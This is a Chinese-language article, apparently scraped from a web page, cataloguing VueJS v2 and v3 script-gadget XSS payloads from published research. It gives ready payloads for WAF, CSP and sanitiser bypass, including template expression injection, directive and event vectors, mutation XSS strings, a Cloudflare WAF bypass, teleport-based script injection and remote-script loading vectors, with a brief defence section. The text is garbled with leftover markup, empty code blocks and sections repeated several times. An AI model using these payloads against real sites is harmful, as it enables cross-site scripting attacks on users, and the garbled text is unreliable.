VueJS脚本小工具规避防御技术详解<\/h1>

概述<\/h2>
本文详细介绍了如何利用VueJS框架中的脚本小工具(Script Gadgets)来绕过各种Web安全防御机制，包括WAF(Web应用防火墙)、CSP(内容安全策略)和HTML过滤器等。这些技术由安全研究人员Gareth Heyes、Lewis Ardern和PwnFunction共同发现并整理。<\/p>

基本概念<\/h2>

脚本小工具(Script Gadgets)<\/h3>
脚本小工具是指由框架创建的额外功能，可以导致JavaScript执行。这些功能可以是JavaScript或基于HTML的，通常对绕过WAF和CSP等防御措施很有用。<\/p>

VueJS v2攻击技术<\/h2>

基本表达式注入<\/h3>

VueJS模板中的表达式可以通过Function构造函数执行任意代码：<\/p>

{ {toString<\/span>().constructor<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span><\/code><\/pre>优化后的更短版本：<\/p>
{ {_c<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span><\/code><\/pre>指令利用<\/h3>
几乎所有VueJS指令都可以作为攻击向量：<\/p>

v-show指令<\/strong>:<\/li>
<\/ol>
<p<\/span> v-show<\/span>=<\/span>"_c.constructor`alert(1)`()"<\/span>>
<\/span><\/span><\/code><\/pre>
v-on指令<\/strong>:<\/li>
<\/ol>
<x<\/span> v-on:click<\/span>=<\/span>'_b.constructor`alert(1)`()'<\/span>>click<\/x<\/span>>
<\/span><\/span><\/code><\/pre>
v-bind指令<\/strong>:<\/li>
<\/ol>
<x<\/span> v-bind:a<\/span>=<\/span>'_b.constructor`alert(1)`()'<\/span>>
<\/span><\/span><\/code><\/pre>最小化向量<\/h3>
研究人员发现多种缩短payload的方法：<\/p>
<x<\/span> @[<\/span>_b<\/span>.<\/span>constructor<\/span>`<\/span>alert<\/span>(<\/span>1<\/span>)`()]<\/span>> (35字节)
<\/span><\/span><x<\/span> :<\/span>[<\/span>_b<\/span>.<\/span>constructor<\/span>`<\/span>alert<\/span>(<\/span>1<\/span>)`()]<\/span>> (33字节)
<\/span><\/span><p<\/span> v-<\/span>=<\/span>_c.constructor`alert(1)`()<\/span>> (33字节)
<\/span><\/span><x<\/span> #[<\/span>_c<\/span>.<\/span>constructor<\/span>`<\/span>alert<\/span>(<\/span>1<\/span>)`()]<\/span>> (33字节)
<\/span><\/span><p<\/span> :<\/span>=<\/span>_c.constructor`alert(1)`()<\/span>> (32字节)
<\/span><\/span><\/code><\/pre>最短的VueJS v2向量(23字节):<\/p>
<x<\/span> is<\/span>=<\/span>script<\/span> src<\/span>=<\/span>\/\/⑭⑭.₨₨<\/span>>
<\/span><\/span><\/code><\/pre>事件利用<\/h3>
利用VueJS的特殊$event<\/code>对象：<\/p>

<\/span><\/span>
<\/span><\/span><\/code><\/pre>更短的跨浏览器版本：<\/p>

<\/span><\/span><\/code><\/pre>利用this<\/code>指向window对象的特性：<\/p>

<\/span><\/span><svg<\/span> @<\/span>load<\/span>=<\/span>this.alert(1)<\/span>>
<\/span><\/span><\/code><\/pre>更紧凑的写法(去除空格):<\/p>
<svg<\/span>@<\/span>load<\/span>=<\/span>this.alert(1)<\/span>>
<\/span><\/span><\/code><\/pre>沉默的水槽(Silent Sink)<\/h3>
当VueJS与jQuery等库结合使用时，可能出现安全漏洞：<\/p>
$<\/span>('#message'<\/span>).text<\/span>("{ {_c.constructor('alert(2)')()} }"<\/span>)
<\/span><\/span><\/code><\/pre>突变XSS(mXSS)<\/h3>
VueJS解析器特性导致的DOM突变：<\/p>

属性名包含引号导致突变:<\/li>
<\/ol>
<x<\/span> title<\/span>"="<<\/span>iframe<\/span> onload  <\/span>=<\/span>alert(1)<\/span>>">
<\/span><\/span><\/code><\/pre>
绕过Cloudflare WAF的变体:<\/li>
<\/ol>
<x<\/span> title<\/span>"="<<\/span>iframe<\/span> onload  <\/span>=<\/span>setTimeout(\/alert(1)\/.source)<\/span>>">
<\/span><\/span><\/code><\/pre>
其他突变形式:<\/li>
<\/ol>
<x<\/span> <<\/span> x<\/span>=<\/span>"<iframe onload=alert(0)>"<\/span>>
<\/span><\/span><x<\/span> =<\/span> x<\/span>=<\/span>"<iframe onload=alert(0)>"<\/span>>
<\/span><\/span><x<\/span> '<\/span> x<\/span>=<\/span>"<iframe onload=alert(0)>"<\/span>>
<\/span><\/span><\/code><\/pre>
模板标签突变:<\/li>
<\/ol>
<template<\/span>><iframe<\/span>><\/iframe<\/span>><\/template<\/span>>
<\/span><\/span><\/code><\/pre>
多重SVG标签导致突变:<\/li>
<\/ol>
<svg<\/span>><svg<\/span>><b<\/span>><noscript<\/span>><\/noscript<\/span>><iframe<\/span>   onload<\/span>=<\/span>alert(1)<\/span>><\/noscript<\/span>><\/b<\/span>><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>突变与CSP绕过<\/h3>
使用VueJS事件处理程序绕过CSP:<\/p>
<svg<\/span>><svg<\/span>><b<\/span>><noscript<\/span>><\/noscript<\/span>><\/noscript<\/span>><\/b<\/span>><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>VueJS v3攻击技术<\/h2>
基本表达式注入<\/h3>
v3中函数名更长:<\/p>
{ {_openBlock<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span>{ {_createBlock<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span>{ {_toDisplayString<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span>{ {_createVNode<\/span>.constructor<\/span>('alert(1)'<\/span>)()} }
<\/span><\/span><\/code><\/pre>指令利用<\/h3>
<p<\/span> v-show<\/span>=<\/span>"_createBlock.constructor`alert(1)`()"<\/span>>
<\/span><\/span><\/code><\/pre>事件利用<\/h3>
<x<\/span> @<\/span>click<\/span>=<\/span>_withCtx.constructor`alert(1)`()<\/span>>click<\/x<\/span>>
<\/span><\/span><x<\/span> @<\/span>click<\/span>=<\/span>$event.view.alert(1)<\/span>>click<\/x<\/span>>
<\/span><\/span><\/code><\/pre>最小化向量<\/h3>
使用_Vue.h<\/code>缩短payload:<\/p>
{ {_Vue<\/span>.h<\/span>.constructor<\/span>`alert(1)`<\/span>()} }
<\/span><\/span><\/code><\/pre>更短的版本:<\/p>
{ {$emit<\/span>.constructor<\/span>`alert(1)`<\/span>()} }
<\/span><\/span><\/code><\/pre>最短的v3向量(31字节):<\/p>
<component<\/span> is<\/span>=<\/span>script<\/span> src<\/span>=<\/span>\/\/⑭⑭.₨₨<\/span>>
<\/span><\/span><\/code><\/pre>使用DOM属性:<\/p>
<component<\/span> is<\/span>=<\/span>script<\/span> text<\/span>=<\/span>alert(1)<\/span>>
<\/span><\/span><\/code><\/pre>传送(Teleport)技术<\/h3>
利用<teleport><\/code>标签转移内容:<\/p>
<teleport<\/span> to<\/span>=<\/span>"#x"<\/span>><b<\/span>>test<\/b<\/span>><\/teleport<\/span>>
<\/span><\/span><\/code><\/pre>注入JavaScript:<\/p>
<teleport<\/span> to<\/span>=<\/span>script:nth-child(2)<\/span>>alert(1)<\/teleport<\/span>><\/div<\/span>><script<\/span>><\/script<\/span>>
<\/span><\/span><\/code><\/pre>修改样式:<\/p>
<teleport<\/span> to<\/span>=<\/span>"style"<\/span>>
<\/span><\/span>    h1 {
<\/span><\/span>      color: red;
<\/span><\/span>    }
<\/span><\/span><\/teleport<\/span>>
<\/span><\/span><\/code><\/pre>反向传送<\/h3>
利用CSS选择器执行表达式:<\/p>
<div<\/span> id<\/span>=<\/span>"app"<\/span>>#x,.haha<\/div<\/span>><div<\/span> class<\/span>=<\/span>haha<\/span>>{ {_Vue.h.constructor`alert(1)`()} }<\/div<\/span>>
<\/span><\/span><\/code><\/pre>实际应用场景<\/h2>
绕过WAF<\/h3>
VueJS解码HTML实体的能力可绕过Cloudflare等WAF。<\/p>
绕过过滤器<\/h3>
DOMPurify等过滤器允许模板语法，与VueJS结合时可能失效。<\/p>
绕过CSP<\/h3>
需要unsafe-eval<\/code>时，VueJS可绕过CSP:<\/p>
\/\/ v2
<\/span><\/span><\/span><\/span>{ {_c<\/span>.constructor<\/span>`alert(document.currentScript.nonce)`<\/span>()} }
<\/span><\/span>
<\/span><\/span>\/\/ v3
<\/span><\/span><\/span><\/span>{ {_Vue<\/span>.h<\/span>.constructor<\/span>`alert(document.currentScript.nonce)`<\/span>()} }
<\/span><\/span><\/code><\/pre>防御建议<\/h2>


对开发者:<\/p>

仔细考虑框架功能可能带来的攻击面<\/li>
了解用户输入可能被滥用或误用的方式<\/li>
<\/ul>
<\/li>

对安全研究人员:<\/p>

深入挖掘框架功能<\/li>
查看底层源码了解实现细节<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本文详细介绍了VueJS v2和v3中的各种脚本小工具技术，包括表达式注入、指令利用、事件利用、mXSS、传送技术等，以及如何利用这些技术绕过WAF、CSP和HTML过滤器。这些技术已被添加到XSS Cheat Sheet的VueJS部分。<\/p>

VueJS脚本小工具规避防御技术详解<\/h1>

基本概念<\/h2>

脚本小工具(Script Gadgets)<\/h3> 脚本小工具是指由框架创建的额外功能，可以导致JavaScript执行。这些功能可以是JavaScript或基于HTML的，通常对绕过WAF和CSP等防御措施很有用。<\/p>

VueJS v2攻击技术<\/h2>

VueJS v3攻击技术<\/h2>

实际应用场景<\/h2>

绕过WAF<\/h3> VueJS解码HTML实体的能力可绕过Cloudflare等WAF。<\/p>

绕过过滤器<\/h3> DOMPurify等过滤器允许模板语法，与VueJS结合时可能失效。<\/p>

总结<\/h2> 本文详细介绍了VueJS v2和v3中的各种脚本小工具技术，包括表达式注入、指令利用、事件利用、mXSS、传送技术等，以及如何利用这些技术绕过WAF、CSP和HTML过滤器。这些技术已被添加到XSS Cheat Sheet的VueJS部分。<\/p>

脚本小工具(Script Gadgets)<\/h3>
脚本小工具是指由框架创建的额外功能，可以导致JavaScript执行。这些功能可以是JavaScript或基于HTML的，通常对绕过WAF和CSP等防御措施很有用。<\/p>

绕过WAF<\/h3>
VueJS解码HTML实体的能力可绕过Cloudflare等WAF。<\/p>

绕过过滤器<\/h3>
DOMPurify等过滤器允许模板语法，与VueJS结合时可能失效。<\/p>

总结<\/h2>
本文详细介绍了VueJS v2和v3中的各种脚本小工具技术，包括表达式注入、指令利用、事件利用、mXSS、传送技术等，以及如何利用这些技术绕过WAF、CSP和HTML过滤器。这些技术已被添加到XSS Cheat Sheet的VueJS部分。<\/p>